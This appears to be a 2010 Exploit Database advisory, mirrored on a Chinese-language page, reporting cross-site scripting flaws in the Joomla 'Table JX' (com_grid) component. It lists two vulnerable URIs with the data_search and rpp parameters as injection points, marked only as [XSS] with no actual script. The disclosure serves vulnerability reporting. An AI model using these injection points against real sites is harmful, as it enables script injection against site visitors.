Joomla! Component Table JX – Cross-Site Scripting

• Exploit Database
• 8 阅读

• 作者： Valentin
  日期： 2010-05-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12473/

• # Exploit Title: Joomla Component Table JX XSS Vulnerabilities
  # Date: 01.05.2010
  # Author: Valentin
  # Category: webapps/0day
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  >> General Information 
  Advisory/Exploit Title = Joomla Component Table JX XSS Vulnerabilities
  Author = Valentin Hoebel
  Contact = valentin@xenuser.org
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  >> Product information
  Name = Table JX
  Vendor = Tools JX
  Vendor Website = http://www.toolsjx.com
  Affected Version(s) = all
  
   
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  >> #1 Vulnerability
  Type = XSS
  index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=[XSS]
  index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=[XSS]
  
  In case you wonder: Yes, those are exactely the same URIs like in the other Joomla
  component "Card View JX". Both of them seem to be named "com_grid" and use exactely
  the same architecture, parameters etc. Therefore both of them are vulnerable to
  the same XSS attacks.
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  >> Additional Information
  Advisory/Exploit Published = 01.05.2010
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  >> Misc
  Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
  <3 packetstormsecurity.org!
  
  
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]